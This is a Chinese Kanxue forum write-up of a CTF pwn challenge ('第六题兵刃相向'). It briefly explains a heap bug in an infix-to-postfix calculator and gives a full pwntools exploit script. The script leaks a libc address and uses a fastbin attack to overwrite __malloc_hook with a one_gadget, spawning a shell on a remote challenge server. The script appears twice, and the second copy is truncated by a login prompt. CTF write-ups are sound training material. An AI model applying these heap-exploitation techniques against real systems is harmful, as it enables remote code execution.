[分享]第六题兵刃相向 wp-CTF对抗-看雪-安全社区|安全招聘|kanxue.com

[分享]第六题兵刃相向 wp
发表于: 2020-11-29 22:08 5025
[分享]第六题兵刃相向 wp

憎饿
2020-11-29 22:08
5025
一个中序表达式转后序表达式计算的程序，parse_infix_expression函数和process_infix_token函数检查都比较严格，因此可以把攻击点着重放在evaluate_postfix_expression函数中。程序在取堆块的时候并没有将原有的堆块的数据置零，可以申请AB两个堆块，B堆块的name设置为运算符，将AB两堆块合并，再取出稍大的堆块，让postfix与B堆块的name对接，使得运算符比操作数要多。

运算符多了，就可以通过这段代码对g_ctx.g_symbol_ptrs进行越界访问了。向上越界对g_ctx.g_symbol_ptrs里的堆块地址做增减运算，可以完成很多事了。

既然可以改变g_ctx.g_symbol_ptrs中的堆块地址，那pval就是可控的了。利用pval写入乘法运算符，之后利用乘法运算符越界将g_ctx.g_broken置零，泄露bin的地址，构造fastbin attack向malloc_hook写入one_gadget就可以得到shell了。
脚本写的很垃圾，有很大的优化空间。不过做出来就行了，也懒得改了。

from pwn import *

context.log_level = "debug"

local = False

if local:

    p = process("./ee")

    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

    one_gadget = 0xf0364

    smallbin_offset = 0x7ffff7dd1b88 - 0x7ffff7a0d000

else:

    p = remote("121.36.145.157","10000")

    libc = ELF("./x64_libc.so.6")

    one_gadget = 0xf02a4

    smallbin_offset = 104 + 0x3C4B20

def Gdb():

    gdb.attach(p,"b *0x555555554000+0x22C3\ndirectory ./srcs/\n")

    #0x1bb7

def create(name, express):

    p.sendlineafter(": ", str(1))

    p.sendafter(": ", name)

    p.sendafter(": ", express)

def show(name):

    p.sendlineafter(": ", str(4))

    p.sendafter(": ", name)

def delete(name):

    p.sendlineafter(": ", str(2))

    p.sendafter(": ", name)

def revalute(name):

    p.sendlineafter(": ", str(3))

    p.sendafter(": ", name)

def getSize(size):

    return (size + 27 + 0x10)
 
create("aaa\n",("00000000000000*" * 6)[:-1]) #0 used

create("-" * 2,("00000000000000*" * 6)[:-1]) #1 used

create("ccc\n",("00000000000000*" * 6)[:-1]) #2 used
 
delete("aaa\n") #0 free

delete("-" * 2) #1 free
 
create("aaa\n",("00000000001-" + "000000000000-" *7)[:-1] + "00")
#0 used

length = "qwertyuiopsdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"

for i in range(21-3):

    create(length[i]*2, "1+1")

create("*"*18, "10000 * 347063282342678 + 7882")

revalute("aaa\n")

revalute("\n")

for i in range(26):

    revalute("aaa\n")

for i in range(21-3):

    delete(length[i]*2)
 
revalute("\n")
 
create("aaa\n",("00000000000000*" * 6)[:-1]) #0 used

create("-" * 2,("00000000000000*" * 6)[:-1]) #1 used

create("ccc\n",("00000000000000*" * 6)[:-1]) #2 used
 
delete("aaa\n") #0 free

delete("-" * 2) #1 free

create("aaa\n",("00000000001-" + "000000000000-" *7)[:-1] + "00")
 
#create("zzz\n",("00000000008-" + "000000000000-" *5)[:-1] + "00") #fastbin attack
#create("uuu\n",("00000000008-" + "000000000000-" *5)[:-1] + "00")
#create("kkk\n",("00000000008-" + "000000000000-" *5)[:-1] + "00")

offset = (0x00005555557584a5 - 0x5555557580fd)

for i in range(offset):

    revalute("aaa\n")

show("1 +00000000!\n")

p.recvuntil("[*]value : ")
 
smallbin = int(p.recvline()[:-1])
#Gdb()

log.success("smallbin ==> " + hex(smallbin))

libc.address = smallbin - smallbin_offset

offset = (0x5555557580fd - 0x5555557580b0)

for i in range(offset):

    revalute("aaa\n")

delete("\n")

for i in range(21-6):

    create(length[i]*2, "1+1")

create("zzz\n",("00000000008-" + "0000000000-" *4)[:-1] + "00") #fastbin attack

create("uuu\n",("00000000008-" + "0000000000-" *4)[:-1] + "00")

create("kkk\n",("00000000008-" + "0000000000-" *4)[:-1] + "00")

create("ttt\n",("00000000008-" + "0000000000-" *4)[:-1] + "00")

offset = (0x0000555555758730 - 0x00005555557586c0)

for i in range(offset):

    revalute("aaa\n")
 
delete("kkk\n")

delete("uuu\n")

delete("\n")
#Gdb()

delete("aaa\n")

delete("qq\n")

delete("rr\n")

delete("uu\n")

create(p64(libc.sym['__malloc_hook']-0x23),("00000000008-" + "0000000000-" *4)[:-1] + "00")

create("deadC0de1",("00000000008-" + "0000000000-" *4)[:-1] + "00")

create("deadC0de2",("00000000008-" + "0000000000-" *4)[:-1] + "00")

one_gadget = libc.address + one_gadget

one_gadget = one_gadget / 4

create("a"*0x12, "{0} * 4 {1}".format(one_gadget,"-00000000"*4))
#Gdb()

create("getshell","1-1")
p.interactive()

from pwn import *

context.log_level = "debug"

local = False

if local:

    p = process("./ee")

    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

    one_gadget = 0xf0364

    smallbin_offset = 0x7ffff7dd1b88 - 0x7ffff7a0d000

else:

    p = remote("121.36.145.157","10000")

    libc = ELF("./x64_libc.so.6")

    one_gadget = 0xf02a4

    smallbin_offset = 104 + 0x3C4B20

def Gdb():

    gdb.attach(p,"b *0x555555554000+0x22C3\ndirectory ./srcs/\n")

    #0x1bb7

def create(name, express):

    p.sendlineafter(": ", str(1))

    p.sendafter(": ", name)

    p.sendafter(": ", express)

def show(name):

    p.sendlineafter(": ", str(4))

    p.sendafter(": ", name)

def delete(name):

    p.sendlineafter(": ", str(2))

    p.sendafter(": ", name)

def revalute(name):

    p.sendlineafter(": ", str(3))

    p.sendafter(": ", name)

def getSize(size):

    return (size + 27 + 0x10)
 
create("aaa\n",("00000000000000*" * 6)[:-1]) #0 used

create("-" * 2,("00000000000000*" * 6)[:-1]) #1 used

create("ccc\n",("00000000000000*" * 6)[:-1]) #2 used
 
delete("aaa\n") #0 free

delete("-" * 2) #1 free
 
create("aaa\n",("00000000001-" + "000000000000-" *7)[:-1] + "00")
#0 used

length = "qwertyuiopsdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"

for i in range(21-3):

    create(length[i]*2, "1+1")

create("*"*18, "10000 * 347063282342678 + 7882")

revalute("aaa\n")

revalute("\n")

for i in range(26):

    revalute("aaa\n")

for i in range(21-3):

    delete(length[i]*2)
 
				登录后可查看完整内容
			
[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)